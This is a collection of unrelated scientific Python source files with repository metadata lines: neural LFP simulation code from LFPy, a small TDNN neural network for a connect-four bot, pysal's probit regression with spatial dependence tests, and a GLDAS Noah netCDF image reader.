M @ (imem['icap'] * network_dummycell.area * 1E-2)
if use_isyn:
probe.data['isyn_e'][:, tstep] = M @ imem['isyn_e']
probe.data['isyn_i'][:, tstep] = M @ imem['isyn_i']
if rec_pop_contributions:
for j, (probe, M) in enumerate(zip(probes, transforms)):
k = 0 # counter
for nsegs, pop_name in zip(population_nsegs,
self.population_names):
cellinds = np.arange(k, k + nsegs)
probe.data[pop_name][:, tstep] = \
M[:, cellinds] @ imem['imem'][cellinds, ]
k += nsegs
tstep += 1
neuron.h.fadvance()
if neuron.h.t % 100. == 0.:
if RANK == 0:
print('t = {} ms'.format(neuron.h.t))
try:
# calculate LFP after final fadvance(), skipped if IndexError is
# encountered
imem = get_imem(imem)
for j, (probe, M) in enumerate(zip(probes, transforms)):
probe.data['imem'][:, tstep] = M @ imem['imem']
if use_ipas:
probe.data['ipas'][:, tstep] = \
M @ (imem['ipas'] * network_dummycell.area * 1E-2)
if use_icap:
probe.data['icap'][:, tstep] = \
M @ (imem['icap'] * network_dummycell.area * 1E-2)
if use_isyn:
probe.data['isyn_e'][:, tstep] = M @ imem['isyn_e']
probe.data['isyn_i'][:, tstep] = M @ imem['isyn_i']
if rec_pop_contributions:
for j, (probe, M) in enumerate(zip(probes, transforms)):
k = 0 # counter
for nsegs, pop_name in zip(population_nsegs,
self.population_names):
cellinds = np.arange(k, k + nsegs)
probe.data[pop_name][:, tstep] = \
M[:, cellinds] @ imem['imem'][cellinds, ]
k += nsegs
except IndexError:
pass
if to_file:
outputfile.close()
def ReduceStructArray(sendbuf, op=MPI.SUM):
"""
simplify MPI Reduce for structured ndarrays with floating point numbers
Parameters
----------
sendbuf: structured ndarray
Array data to be reduced (default: summed)
op: mpi4py.MPI.Op object
MPI_Reduce function. Default is mpi4py.MPI.SUM
Returns
-------
recvbuf: structured ndarray or None
Reduced array on RANK 0, None on all other RANKs
"""
if RANK == 0:
shape = sendbuf.shape
dtype_names = sendbuf.dtype.names
else:
shape = None
dtype_names = None
shape = COMM.bcast(shape)
dtype_names = COMM.bcast(dtype_names)
if RANK == 0:
reduced = np.zeros(shape,
dtype=list(zip(dtype_names,
['f8' for i in range(len(dtype_names)
)])))
else:
reduced = None
for name in dtype_names:
if RANK == 0:
recvbuf = np.zeros(shape)
else:
recvbuf = None
COMM.Reduce(np.array(sendbuf[name]), recvbuf, op=op, root=0)
if RANK == 0:
reduced[name] = recvbuf
return reduced
| espenhgn/LFPy | LFPy/network.py | Python | gpl-3.0 | 66,722 | [
"NEURON"
] | 251efcb3f8b938cce3430c9c326bca016f337ccd897964a62e43d0c3ad39cb78 |
import sys
import json
import random
import numpy as np
def sigmoid(z):
"""
Return the sigmoid function evaluated at the given input.
:param z: Vector or scalar input.
:return: Sigmoid of the given input.
"""
return 1.0 / (1.0 + np.exp(-z))
def sigmoid_prime(z):
"""
Derivative of the sigmoid evaluated at the given input.
:param z: Input vector or scalar.
:return:
"""
return np.exp(-z) * sigmoid(z) ** 2
class CrossEntropyCost(object):
@staticmethod
def fn(a, y):
return np.sum(np.nan_to_num(-y * np.log(a) - (1 - y) * np.log(1 - a)))
@staticmethod
def delta(z, a, y):
return a - y
class QuadraticCost(object):
@staticmethod
def fn(a, y):
return 0.5*np.linalg.norm(a-y)**2
@staticmethod
def delta(z, a, y):
return (a - y) * sigmoid_prime(z)
class TDNN(object):
"""
Following the example here:
http://neuralnetworksanddeeplearning.com/
"""
def __init__(self, nodes_per_layer):
self.num_layers = len(nodes_per_layer)
self.nodes_per_layer = nodes_per_layer
self.biases = None
self.weights = None
self.default_weight_initializer()
self.total_grad_b = None
self.total_grad_w = None
self.last_result = None
self.total_delta_b = None
self.total_delta_w = None
def default_weight_initializer(self):
self.biases = [np.random.randn(y, 1) for y in self.nodes_per_layer[1:]]
# Normalized Gaussian distributed weights
self.weights = [np.random.randn(y, x) / np.sqrt(x)
for x, y in zip(self.nodes_per_layer[:-1], self.nodes_per_layer[1:])]
def large_weight_initializer(self):
self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
self.weights = [np.random.randn(y, x)
for x, y in zip(self.sizes[:-1], self.sizes[1:])]
def predict(self, a):
"""
Predict outputs for the given input.
:param a: An input vector.
:return: A vector of outputs.
"""
for b, w in zip(self.biases, self.weights):
a = sigmoid(np.dot(w, a) + b)
return a
def start_game(self):
self.total_grad_w = None
self.total_grad_b = None
self.last_result = None
self.total_delta_w = None
self.total_delta_b = None
def partial_update(self, x, y, eta, lmbda):
# TODO: All of these need to loop over the different layers of the weights
# QUESTION: What to do about biases exactly?
y_next = y
y_last = self.last_result
grad_b, grad_w = self.backprop(x, y)
if y_last is None:
self.total_grad_b = grad_b
self.total_grad_w = grad_w
self.total_delta_b = [np.zeros(b.shape) for b in grad_b]
self.total_delta_w = [np.zeros(w.shape) for w in grad_w]
else:
self.total_delta_w += -eta * (y_next - y_last) * self.total_grad_w
self.total_delta_b += -eta * (y_next - y_last) * self.total_grad_b # TODO: Check this
self.total_grad_w = [gw + lmbda * tgw for gw, tgw in zip(grad_w, self.total_grad_w)]
self.total_grad_b = [gb + lmbda * tgb for gb, tgb in zip(grad_b, self.total_grad_b)] # TODO: Check this
self.last_result = y
def update_mini_batch(self, x, y, eta, lmbda, n):
"""
:param mini_batch:
:param eta:
:param lmbda:
:param n:
:return:
"""
nabla_b, nabla_w = self.backprop(x, y)
self.weights = [(1 - eta * (lmbda / n)) * w - eta * nw
for w, nw in zip(self.weights, nabla_w)]
self.biases = [b - (eta / len(mini_batch)) * nb
for b, nb in zip(self.biases, nabla_b)]
def backprop(self, x, y):
"""Return a tuple ``(nabla_b, nabla_w)`` representing the
gradient for the cost function C_x. ``nabla_b`` and
``nabla_w`` are layer-by-layer lists of numpy arrays, similar
to ``self.biases`` and ``self.weights``."""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
# feedforward
activation = x
activations = [x] # list to store all the activations, layer by layer
zs = [] # list to store all the z vectors, layer by layer
for b, w in zip(self.biases, self.weights):
z = np.dot(w, activation)+b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
# backward pass
delta = self.cost.delta(zs[-1], activations[-1], y)
nabla_b[-1] = delta
nabla_w[-1] = np.dot(delta, activations[-2].transpose())
# Note that the variable l in the loop below is used a little
# differently to the notation in Chapter 2 of the book. Here,
# l = 1 means the last layer of neurons, l = 2 is the
# second-last layer, and so on. It's a renumbering of the
# scheme in the book, used here to take advantage of the fact
# that Python can use negative indices in lists.
for l in xrange(2, self.num_layers):
z = zs[-l]
sp = sigmoid_prime(z)
delta = np.dot(self.weights[-l+1].transpose(), delta) * sp
nabla_b[-l] = delta
nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())
return nabla_b, nabla_w
def save(self, filename):
"""
:param filename:
:return:
"""
data = {
"sizes": self.sizes,
"weights": [w.tolist() for w in self.weights],
"biases": [b.tolist() for b in self.biases]
}
with open(filename, 'w') as f:
json.dump(data, f)
def load(filename):
with open(filename, 'r') as f:
data = json.load(f)
net = TDNN(data["sizes"])
net.weights = [np.array(w) for w in data['weights']]
net.biases = [np.array(b) for b in data['biases']]
return net | mrbell/connectfour | tdc4bot.py | Python | gpl-3.0 | 6,309 | [
"Gaussian"
] | 1ae0dbf119c1890f5cc19ea0a1802873f824159f84555ae491d2aea1cbea607c |
"""Probit regression class and diagnostics."""
__author__ = "Luc Anselin luc.anselin@asu.edu, Pedro V. Amaral pedro.amaral@asu.edu"
import numpy as np
import numpy.linalg as la
import scipy.optimize as op
from scipy.stats import norm, chisqprob
import scipy.sparse as SP
import user_output as USER
import summary_output as SUMMARY
__all__ = ["Probit"]
class BaseProbit:
"""
Probit class to do all the computations
Parameters
----------
x : array
nxk array of independent variables (assumed to be aligned with y)
y : array
nx1 array of dependent binary variable
w : W
PySAL weights instance aligned with y
optim : string
Optimization method.
Default: 'newton' (Newton-Raphson).
Alternatives: 'ncg' (Newton-CG), 'bfgs' (BFGS algorithm)
scalem : string
Method to calculate the scale of the marginal effects.
Default: 'phimean' (Mean of individual marginal effects)
Alternative: 'xmean' (Marginal effects at variables mean)
maxiter : int
Maximum number of iterations until optimizer stops
Attributes
----------
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
y : array
nx1 array of dependent variable
betas : array
kx1 array with estimated coefficients
predy : array
nx1 array of predicted y values
n : int
Number of observations
k : int
Number of variables
vm : array
Variance-covariance matrix (kxk)
z_stat : list of tuples
z statistic; each tuple contains the pair (statistic,
p-value), where each is a float
xmean : array
Mean of the independent variables (kx1)
predpc : float
Percent of y correctly predicted
logl : float
Log-Likelihhod of the estimation
scalem : string
Method to calculate the scale of the marginal effects.
scale : float
Scale of the marginal effects.
slopes : array
Marginal effects of the independent variables (k-1x1)
Note: Disregards the presence of dummies.
slopes_vm : array
Variance-covariance matrix of the slopes (k-1xk-1)
LR : tuple
Likelihood Ratio test of all coefficients = 0
(test statistics, p-value)
Pinkse_error: float
Lagrange Multiplier test against spatial error correlation.
Implemented as presented in Pinkse (2004)
KP_error : float
Moran's I type test against spatial error correlation.
Implemented as presented in Kelejian and Prucha (2001)
PS_error : float
Lagrange Multiplier test against spatial error correlation.
Implemented as presented in Pinkse and Slade (1998)
warning : boolean
if True Maximum number of iterations exceeded or gradient
and/or function calls not changing.
References
----------
.. [1] Pinkse, J. (2004). Moran-flavored tests with nuisance parameter. In: Anselin,
L., Florax, R. J., Rey, S. J. (editors) Advances in Spatial Econometrics,
pages 67-77. Springer-Verlag, Heidelberg.
.. [2] Kelejian, H., Prucha, I. (2001) "On the asymptotic distribution of the
Moran I test statistic with applications". Journal of Econometrics, 104(2):219-57.
.. [3] Pinkse, J., Slade, M. E. (1998) "Contracting in space: an application of
spatial statistics to discrete-choice models". Journal of Econometrics, 85(1):125-54.
Examples
--------
>>> import numpy as np
>>> import pysal
>>> dbf = pysal.open(pysal.examples.get_path('columbus.dbf'),'r')
>>> y = np.array([dbf.by_col('CRIME')]).T
>>> x = np.array([dbf.by_col('INC'), dbf.by_col('HOVAL')]).T
>>> x = np.hstack((np.ones(y.shape),x))
>>> w = pysal.open(pysal.examples.get_path("columbus.gal"), 'r').read()
>>> w.transform='r'
>>> model = BaseProbit((y>40).astype(float), x, w=w)
>>> np.around(model.betas, decimals=6)
array([[ 3.353811],
[-0.199653],
[-0.029514]])
>>> np.around(model.vm, decimals=6)
array([[ 0.852814, -0.043627, -0.008052],
[-0.043627, 0.004114, -0.000193],
[-0.008052, -0.000193, 0.00031 ]])
>>> tests = np.array([['Pinkse_error','KP_error','PS_error']])
>>> stats = np.array([[model.Pinkse_error[0],model.KP_error[0],model.PS_error[0]]])
>>> pvalue = np.array([[model.Pinkse_error[1],model.KP_error[1],model.PS_error[1]]])
>>> print np.hstack((tests.T,np.around(np.hstack((stats.T,pvalue.T)),6)))
[['Pinkse_error' '3.131719' '0.076783']
['KP_error' '1.721312' '0.085194']
['PS_error' '2.558166' '0.109726']]
"""
def __init__(self, y, x, w=None, optim='newton', scalem='phimean', maxiter=100):
self.y = y
self.x = x
self.n, self.k = x.shape
self.optim = optim
self.scalem = scalem
self.w = w
self.maxiter = maxiter
par_est, self.warning = self.par_est()
self.betas = np.reshape(par_est[0], (self.k, 1))
self.logl = -float(par_est[1])
self._cache = {}
@property
def vm(self):
if 'vm' not in self._cache:
H = self.hessian(self.betas)
self._cache['vm'] = -la.inv(H)
return self._cache['vm']
@property
def z_stat(self):
if 'z_stat' not in self._cache:
variance = self.vm.diagonal()
zStat = self.betas.reshape(len(self.betas),) / np.sqrt(variance)
rs = {}
for i in range(len(self.betas)):
rs[i] = (zStat[i], norm.sf(abs(zStat[i])) * 2)
self._cache['z_stat'] = rs.values()
return self._cache['z_stat']
@property
def slopes_std_err(self):
if 'slopes_std_err' not in self._cache:
variance = self.slopes_vm.diagonal()
self._cache['slopes_std_err'] = np.sqrt(variance)
return self._cache['slopes_std_err']
@property
def slopes_z_stat(self):
if 'slopes_z_stat' not in self._cache:
zStat = self.slopes.reshape(
len(self.slopes),) / self.slopes_std_err
rs = {}
for i in range(len(self.slopes)):
rs[i] = (zStat[i], norm.sf(abs(zStat[i])) * 2)
self._cache['slopes_z_stat'] = rs.values()
return self._cache['slopes_z_stat']
@property
def xmean(self):
if 'xmean' not in self._cache:
self._cache['xmean'] = np.reshape(
sum(self.x) / self.n, (self.k, 1))
return self._cache['xmean']
@property
def xb(self):
if 'xb' not in self._cache:
self._cache['xb'] = np.dot(self.x, self.betas)
return self._cache['xb']
@property
def predy(self):
if 'predy' not in self._cache:
self._cache['predy'] = norm.cdf(self.xb)
return self._cache['predy']
@property
def predpc(self):
if 'predpc' not in self._cache:
predpc = abs(self.y - self.predy)
for i in range(len(predpc)):
if predpc[i] > 0.5:
predpc[i] = 0
else:
predpc[i] = 1
self._cache['predpc'] = float(100 * np.sum(predpc) / self.n)
return self._cache['predpc']
@property
def phiy(self):
if 'phiy' not in self._cache:
self._cache['phiy'] = norm.pdf(self.xb)
return self._cache['phiy']
@property
def scale(self):
if 'scale' not in self._cache:
if self.scalem == 'phimean':
self._cache['scale'] = float(1.0 * np.sum(self.phiy) / self.n)
if self.scalem == 'xmean':
self._cache['scale'] = float(
norm.pdf(np.dot(self.xmean.T, self.betas)))
return self._cache['scale']
@property
def slopes(self):
if 'slopes' not in self._cache:
# Disregard the presence of dummies.
self._cache['slopes'] = self.betas[1:] * self.scale
return self._cache['slopes']
@property
def slopes_vm(self):
if 'slopes_vm' not in self._cache:
x = self.xmean
b = self.betas
dfdb = np.eye(self.k) - np.dot(b.T, x) * np.dot(b, x.T)
slopes_vm = (self.scale ** 2) * \
np.dot(np.dot(dfdb, self.vm), dfdb.T)
self._cache['slopes_vm'] = slopes_vm[1:, 1:]
return self._cache['slopes_vm']
@property
def LR(self):
if 'LR' not in self._cache:
P = 1.0 * np.sum(self.y) / self.n
LR = float(
-2 * (self.n * (P * np.log(P) + (1 - P) * np.log(1 - P)) - self.logl))
self._cache['LR'] = (LR, chisqprob(LR, self.k))
return self._cache['LR']
@property
def u_naive(self):
if 'u_naive' not in self._cache:
u_naive = self.y - self.predy
self._cache['u_naive'] = u_naive
return self._cache['u_naive']
@property
def u_gen(self):
if 'u_gen' not in self._cache:
Phi_prod = self.predy * (1 - self.predy)
u_gen = self.phiy * (self.u_naive / Phi_prod)
self._cache['u_gen'] = u_gen
return self._cache['u_gen']
@property
def Pinkse_error(self):
if 'Pinkse_error' not in self._cache:
self._cache['Pinkse_error'], self._cache[
'KP_error'], self._cache['PS_error'] = sp_tests(self)
return self._cache['Pinkse_error']
@property
def KP_error(self):
if 'KP_error' not in self._cache:
self._cache['Pinkse_error'], self._cache[
'KP_error'], self._cache['PS_error'] = sp_tests(self)
return self._cache['KP_error']
@property
def PS_error(self):
if 'PS_error' not in self._cache:
self._cache['Pinkse_error'], self._cache[
'KP_error'], self._cache['PS_error'] = sp_tests(self)
return self._cache['PS_error']
def par_est(self):
start = np.dot(la.inv(np.dot(self.x.T, self.x)),
np.dot(self.x.T, self.y))
flogl = lambda par: -self.ll(par)
if self.optim == 'newton':
fgrad = lambda par: self.gradient(par)
fhess = lambda par: self.hessian(par)
par_hat = newton(flogl, start, fgrad, fhess, self.maxiter)
warn = par_hat[2]
else:
fgrad = lambda par: -self.gradient(par)
if self.optim == 'bfgs':
par_hat = op.fmin_bfgs(
flogl, start, fgrad, full_output=1, disp=0)
warn = par_hat[6]
if self.optim == 'ncg':
fhess = lambda par: -self.hessian(par)
par_hat = op.fmin_ncg(
flogl, start, fgrad, fhess=fhess, full_output=1, disp=0)
warn = par_hat[5]
if warn > 0:
warn = True
else:
warn = False
return par_hat, warn
def ll(self, par):
beta = np.reshape(np.array(par), (self.k, 1))
q = 2 * self.y - 1
qxb = q * np.dot(self.x, beta)
ll = sum(np.log(norm.cdf(qxb)))
return ll
def gradient(self, par):
beta = np.reshape(np.array(par), (self.k, 1))
q = 2 * self.y - 1
qxb = q * np.dot(self.x, beta)
lamb = q * norm.pdf(qxb) / norm.cdf(qxb)
gradient = np.dot(lamb.T, self.x)[0]
return gradient
def hessian(self, par):
beta = np.reshape(np.array(par), (self.k, 1))
q = 2 * self.y - 1
xb = np.dot(self.x, beta)
qxb = q * xb
lamb = q * norm.pdf(qxb) / norm.cdf(qxb)
hessian = np.dot((self.x.T), (-lamb * (lamb + xb) * self.x))
return hessian
class Probit(BaseProbit):
"""
Classic non-spatial Probit and spatial diagnostics. The class includes a
printout that formats all the results and tests in a nice format.
The diagnostics for spatial dependence currently implemented are:
* Pinkse Error [1]_
* Kelejian and Prucha Moran's I [2]_
* Pinkse & Slade Error [3]_
Parameters
----------
x : array
nxk array of independent variables (assumed to be aligned with y)
y : array
nx1 array of dependent binary variable
w : W
PySAL weights instance aligned with y
optim : string
Optimization method.
Default: 'newton' (Newton-Raphson).
Alternatives: 'ncg' (Newton-CG), 'bfgs' (BFGS algorithm)
scalem : string
Method to calculate the scale of the marginal effects.
Default: 'phimean' (Mean of individual marginal effects)
Alternative: 'xmean' (Marginal effects at variables mean)
maxiter : int
Maximum number of iterations until optimizer stops
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_w : string
Name of weights matrix for use in output
name_ds : string
Name of dataset for use in output
Attributes
----------
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
y : array
nx1 array of dependent variable
betas : array
kx1 array with estimated coefficients
predy : array
nx1 array of predicted y values
n : int
Number of observations
k : int
Number of variables
vm : array
Variance-covariance matrix (kxk)
z_stat : list of tuples
z statistic; each tuple contains the pair (statistic,
p-value), where each is a float
xmean : array
Mean of the independent variables (kx1)
predpc : float
Percent of y correctly predicted
logl : float
Log-Likelihhod of the estimation
scalem : string
Method to calculate the scale of the marginal effects.
scale : float
Scale of the marginal effects.
slopes : array
Marginal effects of the independent variables (k-1x1)
slopes_vm : array
Variance-covariance matrix of the slopes (k-1xk-1)
LR : tuple
Likelihood Ratio test of all coefficients = 0
(test statistics, p-value)
Pinkse_error: float
Lagrange Multiplier test against spatial error correlation.
Implemented as presented in Pinkse (2004)
KP_error : float
Moran's I type test against spatial error correlation.
Implemented as presented in Kelejian and Prucha (2001)
PS_error : float
Lagrange Multiplier test against spatial error correlation.
Implemented as presented in Pinkse and Slade (1998)
warning : boolean
if True Maximum number of iterations exceeded or gradient
and/or function calls not changing.
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_w : string
Name of weights matrix for use in output
name_ds : string
Name of dataset for use in output
title : string
Name of the regression method used
References
----------
.. [1] Pinkse, J. (2004). Moran-flavored tests with nuisance parameter. In: Anselin, L., Florax, R. J., Rey, S. J. (editors) Advances in Spatial Econometrics, pages 67-77. Springer-Verlag, Heidelberg.
.. [2] Kelejian, H., Prucha, I. (2001) "On the asymptotic distribution of the Moran I test statistic with applications". Journal of Econometrics, 104(2):219-57.
.. [3] Pinkse, J., Slade, M. E. (1998) "Contracting in space: an application of spatial statistics to discrete-choice models". Journal of Econometrics, 85(1):125-54.
Examples
--------
We first need to import the needed modules, namely numpy to convert the
data we read into arrays that ``spreg`` understands and ``pysal`` to
perform all the analysis.
>>> import numpy as np
>>> import pysal
Open data on Columbus neighborhood crime (49 areas) using pysal.open().
This is the DBF associated with the Columbus shapefile. Note that
pysal.open() also reads data in CSV format; since the actual class
requires data to be passed in as numpy arrays, the user can read their
data in using any method.
>>> dbf = pysal.open(pysal.examples.get_path('columbus.dbf'),'r')
Extract the CRIME column (crime) from the DBF file and make it the
dependent variable for the regression. Note that PySAL requires this to be
an numpy array of shape (n, 1) as opposed to the also common shape of (n, )
that other packages accept. Since we want to run a probit model and for this
example we use the Columbus data, we also need to transform the continuous
CRIME variable into a binary variable. As in McMillen, D. (1992) "Probit with
spatial autocorrelation". Journal of Regional Science 32(3):335-48, we define
y = 1 if CRIME > 40.
>>> y = np.array([dbf.by_col('CRIME')]).T
>>> y = (y>40).astype(float)
Extract HOVAL (home values) and INC (income) vectors from the DBF to be used as
independent variables in the regression. Note that PySAL requires this to
be an nxj numpy array, where j is the number of independent variables (not
including a constant). By default this class adds a vector of ones to the
independent variables passed in.
>>> names_to_extract = ['INC', 'HOVAL']
>>> x = np.array([dbf.by_col(name) for name in names_to_extract]).T
Since we want to the test the probit model for spatial dependence, we need to
specify the spatial weights matrix that includes the spatial configuration of
the observations into the error component of the model. To do that, we can open
an already existing gal file or create a new one. In this case, we will use
``columbus.gal``, which contains contiguity relationships between the
observations in the Columbus dataset we are using throughout this example.
Note that, in order to read the file, not only to open it, we need to
append '.read()' at the end of the command.
>>> w = pysal.open(pysal.examples.get_path("columbus.gal"), 'r').read()
Unless there is a good reason not to do it, the weights have to be
row-standardized so every row of the matrix sums to one. In PySAL, this
can be easily performed in the following way:
>>> w.transform='r'
We are all set with the preliminaries, we are good to run the model. In this
case, we will need the variables and the weights matrix. If we want to
have the names of the variables printed in the output summary, we will
have to pass them in as well, although this is optional.
>>> model = Probit(y, x, w=w, name_y='crime', name_x=['income','home value'], name_ds='columbus', name_w='columbus.gal')
Once we have run the model, we can explore a little bit the output. The
regression object we have created has many attributes so take your time to
discover them.
>>> np.around(model.betas, decimals=6)
array([[ 3.353811],
[-0.199653],
[-0.029514]])
>>> np.around(model.vm, decimals=6)
array([[ 0.852814, -0.043627, -0.008052],
[-0.043627, 0.004114, -0.000193],
[-0.008052, -0.000193, 0.00031 ]])
Since we have provided a spatial weigths matrix, the diagnostics for
spatial dependence have also been computed. We can access them and their
p-values individually:
>>> tests = np.array([['Pinkse_error','KP_error','PS_error']])
>>> stats = np.array([[model.Pinkse_error[0],model.KP_error[0],model.PS_error[0]]])
>>> pvalue = np.array([[model.Pinkse_error[1],model.KP_error[1],model.PS_error[1]]])
>>> print np.hstack((tests.T,np.around(np.hstack((stats.T,pvalue.T)),6)))
[['Pinkse_error' '3.131719' '0.076783']
['KP_error' '1.721312' '0.085194']
['PS_error' '2.558166' '0.109726']]
Or we can easily obtain a full summary of all the results nicely formatted and
ready to be printed simply by typing 'print model.summary'
"""
def __init__(
self, y, x, w=None, optim='newton', scalem='phimean', maxiter=100,
vm=False, name_y=None, name_x=None, name_w=None, name_ds=None,
spat_diag=False):
n = USER.check_arrays(y, x)
USER.check_y(y, n)
if w:
USER.check_weights(w, y)
spat_diag = True
x_constant = USER.check_constant(x)
BaseProbit.__init__(self, y=y, x=x_constant, w=w,
optim=optim, scalem=scalem, maxiter=maxiter)
self.title = "CLASSIC PROBIT ESTIMATOR"
self.name_ds = USER.set_name_ds(name_ds)
self.name_y = USER.set_name_y(name_y)
self.name_x = USER.set_name_x(name_x, x)
self.name_w = USER.set_name_w(name_w, w)
SUMMARY.Probit(reg=self, w=w, vm=vm, spat_diag=spat_diag)
def newton(flogl, start, fgrad, fhess, maxiter):
"""
Calculates the Newton-Raphson method
Parameters
----------
flogl : lambda
Function to calculate the log-likelihood
start : array
kx1 array of starting values
fgrad : lambda
Function to calculate the gradient
fhess : lambda
Function to calculate the hessian
maxiter : int
Maximum number of iterations until optimizer stops
"""
warn = 0
iteration = 0
par_hat0 = start
m = 1
while (iteration < maxiter and m >= 1e-04):
H = -la.inv(fhess(par_hat0))
g = fgrad(par_hat0).reshape(start.shape)
Hg = np.dot(H, g)
par_hat0 = par_hat0 + Hg
iteration += 1
m = np.dot(g.T, Hg)
if iteration == maxiter:
warn = 1
logl = flogl(par_hat0)
return (par_hat0, logl, warn)
def sp_tests(reg):
"""
Calculates tests for spatial dependence in Probit models
Parameters
----------
reg : regression object
output instance from a probit model
"""
if reg.w:
w = reg.w.sparse
Phi = reg.predy
phi = reg.phiy
# Pinkse_error:
Phi_prod = Phi * (1 - Phi)
u_naive = reg.u_naive
u_gen = reg.u_gen
sig2 = np.sum((phi * phi) / Phi_prod) / reg.n
LM_err_num = np.dot(u_gen.T, (w * u_gen)) ** 2
trWW = np.sum((w * w).diagonal())
trWWWWp = trWW + np.sum((w * w.T).diagonal())
LM_err = float(1.0 * LM_err_num / (sig2 ** 2 * trWWWWp))
LM_err = np.array([LM_err, chisqprob(LM_err, 1)])
# KP_error:
moran = moran_KP(reg.w, u_naive, Phi_prod)
# Pinkse-Slade_error:
u_std = u_naive / np.sqrt(Phi_prod)
ps_num = np.dot(u_std.T, (w * u_std)) ** 2
trWpW = np.sum((w.T * w).diagonal())
ps = float(ps_num / (trWW + trWpW))
# chi-square instead of bootstrap.
ps = np.array([ps, chisqprob(ps, 1)])
else:
raise Exception, "W matrix not provided to calculate spatial test."
return LM_err, moran, ps
def moran_KP(w, u, sig2i):
"""
Calculates Moran-flavoured tests
Parameters
----------
w : W
PySAL weights instance aligned with y
u : array
nx1 array of naive residuals
sig2i : array
nx1 array of individual variance
"""
w = w.sparse
moran_num = np.dot(u.T, (w * u))
E = SP.lil_matrix(w.get_shape())
E.setdiag(sig2i.flat)
E = E.asformat('csr')
WE = w * E
moran_den = np.sqrt(np.sum((WE * WE + (w.T * E) * WE).diagonal()))
moran = float(1.0 * moran_num / moran_den)
moran = np.array([moran, norm.sf(abs(moran)) * 2.])
return moran
def _test():
import doctest
start_suppress = np.get_printoptions()['suppress']
np.set_printoptions(suppress=True)
doctest.testmod()
np.set_printoptions(suppress=start_suppress)
if __name__ == '__main__':
_test()
import numpy as np
import pysal
dbf = pysal.open(pysal.examples.get_path('columbus.dbf'), 'r')
y = np.array([dbf.by_col('CRIME')]).T
var_x = ['INC', 'HOVAL']
x = np.array([dbf.by_col(name) for name in var_x]).T
w = pysal.open(pysal.examples.get_path("columbus.gal"), 'r').read()
w.transform = 'r'
probit1 = Probit(
(y > 40).astype(float), x, w=w, name_x=var_x, name_y="CRIME",
name_ds="Columbus", name_w="columbus.dbf")
# print probit1.summary
| spreg-git/pysal | pysal/spreg/probit.py | Python | bsd-3-clause | 26,765 | [
"COLUMBUS"
] | 84bb201c23f9372d91133546df1791aac7722b66dd6fb7034efcad505c07cb5d |
# The MIT License (MIT)
#
# Copyright (c) 2018, TU Wien
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import warnings
import numpy as np
import os
try:
import pygrib
except ImportError:
warnings.warn("pygrib has not been imported")
from pygeobase.io_base import ImageBase, MultiTemporalImageBase
from pygeobase.object_base import Image
from pynetcf.time_series import GriddedNcOrthoMultiTs
from datetime import timedelta
from gldas.grid import GLDAS025Cellgrid
from netCDF4 import Dataset
from pygeogrids.netcdf import load_grid
class GLDAS_Noah_v21_025Img(ImageBase):
"""
Class for reading one GLDAS Noah v2.1 nc file in 0.25 deg grid.
Parameters
----------
filename: string
filename of the GLDAS nc file
mode: string, optional
mode of opening the file, only 'r' is implemented at the moment
parameter : string or list, optional
one or list of parameters to read, see GLDAS v2.1 documentation
for more information (default: 'SoilMoi0_10cm_inst').
subgrid : Cell Grid
Subgrid of the global GLDAS Grid to use for reading image data (e.g only land points)
array_1D: boolean, optional
if set then the data is read into 1D arrays.
Needed for some legacy code.
"""
def __init__(self, filename, mode='r', parameter='SoilMoi0_10cm_inst',
subgrid=None, array_1D=False):
super(GLDAS_Noah_v21_025Img, self).__init__(filename, mode=mode)
if type(parameter) != list:
parameter = [parameter]
self.parameters = parameter
self.fill_values = np.repeat(9999., 1440 * 120)
self.grid = GLDAS025Cellgrid() if not subgrid else subgrid
self.array_1D = array_1D
def read(self, timestamp=None):
# print 'read file: %s' %self.filename
# Returns the selected parameters for a gldas image and
# according metadata
return_img = {}
return_metadata = {}
try:
dataset = Dataset(self.filename)
except IOError as e:
print(e)
print(" ".join([self.filename, "can not be opened"]))
raise e
param_names = []
for parameter in self.parameters:
param_names.append(parameter)
for parameter, variable in dataset.variables.items():
if parameter in param_names:
param_metadata = {}
param_data = {}
for attrname in variable.ncattrs():
if attrname in ['long_name', 'units']:
param_metadata.update(
{str(attrname): getattr(variable, attrname)})
param_data = dataset.variables[parameter][:]
np.ma.set_fill_value(param_data, 9999)
param_data = np.concatenate((
self.fill_values,
np.ma.getdata(param_data.filled()).flatten()))
return_img.update(
{str(parameter): param_data[self.grid.activegpis]})
return_metadata.update({str(parameter): param_metadata})
# Check for corrupt files
try:
return_img[parameter]
except KeyError:
path, thefile = os.path.split(self.filename)
print ('%s in %s is corrupt - filling'
'image with NaN values' % (parameter, thefile))
return_img[parameter] = np.empty(
self.grid.n_gpi).fill(np.nan)
return_metadata['corrupt_parameters'].append()
dataset.close()
if self.array_1D:
return Image(self.grid.activearrlon, self.grid.activearrlat,
return_img, return_metadata, timestamp)
else:
for key in return_img:
return_img[key] = np.flipud(
return_img[key].reshape((720, 1440)))
return Image(np.flipud(self.grid.activearrlon.reshape((720, 1440))),
np.flipud(self.grid.activearrlat.reshape((720, 1440))),
return_img,
return_metadata,
timestamp)
def write(self, data):
raise NotImplementedError()
def flush(self):
pass
